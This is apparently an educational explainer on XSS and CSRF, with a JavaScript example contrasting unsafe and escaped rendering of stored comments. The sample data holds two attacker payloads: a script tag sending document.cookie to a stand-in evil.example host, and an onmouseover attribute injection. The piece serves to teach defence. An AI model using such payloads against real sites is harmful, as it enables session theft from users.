Cross-site scripting (XSS)
What is XSS
There are a couple of types of XSS: reflected, stored, DOM-based, and mutation XSS.
The first one is reflected XSS, where script the attacker placed in the request (for example in a URL parameter) is copied straight back into the response. The browser cannot tell that part of the page apart from the site's own markup, so it parses the injected text as a script block and executes it in the origin of the vulnerable site.
Stored XSS is similar to reflected XSS but more powerful. Instead of being reflected straight back in one response, the payload is stored by the application (typically in a database) and served to everyone who later views the page that includes it. For example, an attacker can type script tags (<script></script>) into the comment area of a vulnerable website, and every user who views that comment runs the script automatically, without having to click a crafted link.
How XSS works
How can we prevent XSS
Popular frameworks like React, Vue, and Angular have helped deal with such problems: their templates escape interpolated values by default, so a comment containing <script> is rendered as visible text rather than as markup. The protection is context-dependent and has explicit escape hatches (React's dangerouslySetInnerHTML, Vue's v-html, Angular's bypassSecurityTrustHtml), so untrusted data passed through those, or placed into a URL or event-handler attribute, still needs its own encoding or sanitization.
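To make the stored-XSS scenario and the framework defence concrete, here is an added example (not code from the original post) that renders the same stored comments twice: once by string concatenation, which is what a vulnerable server-side template does, and once with the context-aware HTML escaping that React, Vue and Angular templates apply by default. The comment records, the attacker payloads and the list markup are constructed for illustration.

```javascript
// Added example, not from the original post. Comment records and payloads
// below are constructed for illustration.

// Escape the five characters that can break out of an HTML text node or a
// quoted attribute. This is sufficient for those two contexts only; values
// placed into URLs, event handlers or CSS need their own encoders.
function escapeHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: the stored comment is concatenated straight into the page.
// A browser receiving this HTML sees a real <script> element and runs it
// for every visitor who loads the thread (stored XSS).
function renderCommentUnsafe(comment) {
  return `<li class="comment" data-author="${comment.author}">${comment.body}</li>`;
}

// Hardened: identical markup, but each untrusted value is encoded for the
// context it lands in (a text node and a double-quoted attribute). This is
// the behaviour framework templates give you automatically.
function renderCommentSafe(comment) {
  return `<li class="comment" data-author="${escapeHtml(comment.author)}">` +
    `${escapeHtml(comment.body)}</li>`;
}

// Render a whole thread with whichever renderer the caller picks.
function renderThread(comments, renderComment) {
  return `<ul>${comments.map(renderComment).join('')}</ul>`;
}

// Constructed sample data: one benign comment and two attacker payloads.
const storedComments = [
  { author: 'alice', body: 'Nice post!' },
  // Script-tag payload of the kind the text above describes.
  {
    author: 'mallory',
    body: '<script>location="https://evil.example/?c="+document.cookie</script>',
  },
  // Attribute-context payload: escapes data-author without any <script>.
  { author: 'eve" onmouseover="alert(1)', body: 'hi' },
];
```

Run `renderThread(storedComments, renderCommentUnsafe)` and the output contains a live script element and an injected onmouseover handler; run it with `renderCommentSafe` and both payloads survive only as inert text. The framework escape hatches named above (dangerouslySetInnerHTML, v-html, bypassSecurityTrustHtml) put you back in the unsafe branch, so anything routed through them must be sanitized first.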
Cross-site request forgery (or CSRF)
What is CSRF and how it works
Cross-site request forgery (or CSRF) allows an attacker to induce a victim user to perform actions that they do not intend to. Let's say you've logged in to an online bank website, and then you are lured into opening a malicious web page in another tab. That page can forge a request to the bank's server that performs some dangerous action, such as a transfer, because the browser attaches the bank's cookies to every request it makes to the bank's domain, regardless of which page initiated the request. As a result, the forged action happens in the context of your authenticated session. The attacker's page cannot read the bank's response, but it does not need to: the damage is done by the request itself.
How can we prevent CSRF problems
Anti CSRF token
A CSRF token is a unique, secret, unpredictable value that is generated by the server-side application and transmitted to the client in such a way that it is included in a subsequent HTTP request made by the client. When the later request is made, the server-side application validates that the request includes the expected token and rejects the request if the token is missing or invalid. The token must be bound to the user's session and checked against the server-side copy, not against another value supplied in the same request; it works because the attacker's page, sitting on a different origin, cannot read the bank's pages to learn the token, even though it can make the browser send the bank's cookies.